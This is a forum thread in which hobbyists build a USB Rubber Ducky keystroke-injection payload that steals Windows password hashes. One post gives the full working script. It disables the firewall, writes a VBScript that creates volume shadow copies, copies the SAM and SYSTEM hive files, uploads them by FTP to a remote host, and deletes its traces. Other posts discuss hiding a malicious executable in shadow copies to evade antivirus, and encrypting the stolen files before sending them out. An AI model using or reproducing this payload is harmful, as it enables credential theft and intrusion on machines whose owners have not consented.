Xcellerator Posted February 2, 2012 Share Posted February 2, 2012 Hi guys, I read this article here, and thought that it'd work great as a Ducky Payload. I originally wrote it for my Teensy board (I don't have a USBRD) but then rewrote it for the Ducky. I admit it's not the cleanest code in the world (the Teensy version), but it works. The delays are just a guide to work with MOST machines, but on a faster machine (a server for example, :o ), I'm sure you could reduce them greatly. Here is the link the code on the USBRD Wiki: LINK, and there is also a link to the pastebin with the Teensy version aswell in the description. Let me know what you think! Quote Link to comment Share on other sites More sharing options...
PCFreak Posted February 10, 2012 Share Posted February 10, 2012 ... Let me know what you think! Nice! The VSSOwn script makes me thinking a lot...... :D Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted February 10, 2012 Author Share Posted February 10, 2012 Yeah, I saw a demonstration of it and thought that it'd work brilliantly as payload... Quote Link to comment Share on other sites More sharing options...
PCFreak Posted February 10, 2012 Share Posted February 10, 2012 Yeah, I saw a demonstration of it and thought that it'd work brilliantly as payload... I played a little bit with it. For Rubberducky payloads it makes not that much sense, since we do everything by keyboard and if we create an evil executable on the target system just by keyboard inputs we do not need to hide it, we want to execute it right now! It might be interesting if you want to place the executable on the target system and then run it via a Scheduled task that you also setup with the ducky. I think about the following 1. Create executable via base64 encoding through VBScript in the windows\system32 folder 2. Place vssown.vbs on target system 2. Create a shadow copy 3. Delete your executable 4. Setup a scheduled task that calls vssown.vbs /execute \Windows\system32\evil.exe The only advantage of this procedure would be that evil.exe is not visible for nearly 99% of users since no one would mount a Shadow Copy. My opinion: Good idea but not so practical for the Ducky. Maybe if we could access the ducky's flash somehow it might be interesting in the future. Cheers Peter Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted February 10, 2012 Author Share Posted February 10, 2012 That's an interesting idea, and I would be very interested in incorporating that idea into a Metasploit Module. One of the most difficult things about binary dropping from Metasploit is AV's picking them up, and leaving tracks on the target. Although they can be removed upon successful exploitation, any errors can be fatal. Also, has any checked to see if AVs do pick up on executables stored in a shadow copy? I'd be very surprised if it can... Quote Link to comment Share on other sites More sharing options...
teknic Posted March 7, 2012 Share Posted March 7, 2012 (edited) Has anyone actually gotten this script to work? I've been trying it on my win7 box, but have had no luck. Edited March 7, 2012 by teknic Quote Link to comment Share on other sites More sharing options...
PCFreak Posted March 8, 2012 Share Posted March 8, 2012 Has anyone actually gotten this script to work? I've been trying it on my win7 box, but have had no luck. What script do you mean? The vssown.vbs? It should work on a Win7 Box without any problems (administrative shell required). Cheers PCFreak Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted March 8, 2012 Author Share Posted March 8, 2012 I tested the script (for the Teensy++ 2.0) on a Windows 7 box.. Quote Link to comment Share on other sites More sharing options...
VirtualGEEK Posted March 8, 2012 Share Posted March 8, 2012 I had problems with it... 1)There are a couple of typos in the USBRD script: "STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM ." "STRING copy \\?\GLoBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM ." 2) My test box didn't have a "HarddiskVolumeShadowCopy1" so the script would fail, delete the .vbs files and exit without displaying the error. I commented out the lines to exit and delete the vbs files and ran vssown.vbs /list to see if "1" existed and it did not. Every time the /create line runs it would increment (11, 12, 13) so I edited the payload to change "1" to the next expected shadowcopy# and then it finally copied the files. Perhaps the payload should use /list to determine the next shadow created or try the next 25 #s if "HarddiskVolumeShadowCopy1" fails? Quote Link to comment Share on other sites More sharing options...
--nick-- Posted October 3, 2012 Share Posted October 3, 2012 I could really use your guys help on this Quote Link to comment Share on other sites More sharing options...
skysploit Posted May 9, 2013 Share Posted May 9, 2013 Here's the VSSown payload rebuilt... Instead of downloading VSSOwn, this payload builds a modified version of the vbs file (only the needed parts).. It runs the "/create c" five times. The reason for this is because each operating system typically already has 2-3 shadow copies and we want a new shadow copy with the current hashes. In addition to pulling the SAM & SYSTEM files, this payload drops the firewall and sends the files to a remote FTP server. Sending these files via FTP (in the clear) on a pentest will likely get you sued, this is just an example on how to extract the data... This payload runs on Windows 7 w/UAC enabled. This payload will be added to the simple-ducky in the next update. DELAY 2000 ESCAPE DELAY 600 CONTROL ESCAPE DELAY 600 STRING cmd DELAY 600 MENU DELAY 600 STRING a DELAY 700 LEFTARROW DELAY 400 ENTER DELAY 800 STRING cd %USERPROFILE% ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING copy con vssown.vbs ENTER STRING Set args = WScript.Arguments ENTER STRING strComputer = "." ENTER STRING Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") ENTER STRING Select Case args.Item(0) ENTER STRING Case "/start" ENTER STRING Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'") ENTER STRING For Each objService in colListOfServices ENTER STRING objService.StartService() ENTER STRING Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service." ENTER STRING Next ENTER STRING wscript.Quit(0) ENTER STRING Case "/stop" ENTER STRING Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'") ENTER STRING For Each objService in colListOfServices ENTER STRING objService.StopService() ENTER STRING Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service." ENTER STRING Next ENTER STRING wscript.Quit(0) ENTER STRING Case "/create" ENTER STRING VOLUME = args.Item(1) & ":\" ENTER STRING Const CONTEXT = "ClientAccessible" ENTER STRING Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy") ENTER STRING Wscript.Echo "[*] Attempting to create a shadow copy." ENTER STRING errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID) ENTER STRING wscript.Quit(errResult) ENTER STRING End Select ENTER CTRL z ENTER STRING cscript vssown.vbs /start ENTER STRING cscript vssown.vbs /create c ENTER STRING cscript vssown.vbs /create c ENTER STRING cscript vssown.vbs /create c ENTER STRING cscript vssown.vbs /create c ENTER STRING cscript vssown.vbs /create c ENTER STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM . ENTER DELAY 1000 STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM . ENTER DELAY 1000 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING ftp ENTER DELAY 500 STRING open 192.168.10.109 ENTER DELAY 800 STRING hacker ENTER DELAY 1000 STRING hacker ENTER DELAY 1000 STRING bin ENTER DELAY 800 STRING put SAM ENTER DELAY 800 STRING put SYSTEM ENTER DELAY 800 STRING quit ENTER DELAY 200 STRING DEL SAM ENTER STRING DEL SYSTEM ENTER STRING DEL vssown.vbs ENTER STRING exit ENTER ~skysploit Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted May 19, 2013 Author Share Posted May 19, 2013 (edited) Wow, glad to see the progress this payload has made! Quick execution of this (particularly on stuff like personal laptops with only one user) is a fast track to owning the first box on the network! Would be great to include some form of encryption before FTPing the files over, though! Perhaps hosting a truecrypt binary on the FTP server, downloading it first to encrypt, then upload the TC file? Just an idea, but I'll look into it..! Edited May 19, 2013 by Xcellerator Quote Link to comment Share on other sites More sharing options...
skysploit Posted May 20, 2013 Share Posted May 20, 2013 Wow, glad to see the progress this payload has made! Quick execution of this (particularly on stuff like personal laptops with only one user) is a fast track to owning the first box on the network! Would be great to include some form of encryption before FTPing the files over, though! Perhaps hosting a truecrypt binary on the FTP server, downloading it first to encrypt, then upload the TC file? Just an idea, but I'll look into it..! Download the latest version of the simple-ducky (v1.1.0): https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.0_debian.sh&can=2&q= It has a modified version of this payload which uses 7za to AES256 encrypt the extracted files prior to sending them over ftp. It also has a built in hasher and custom wordlist builder. So say if you are pentesting company X, you can download their website and generate a password list based on every word extracted. You are then prompted with the option to merge the new list with the default list in John. ~skysploit Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.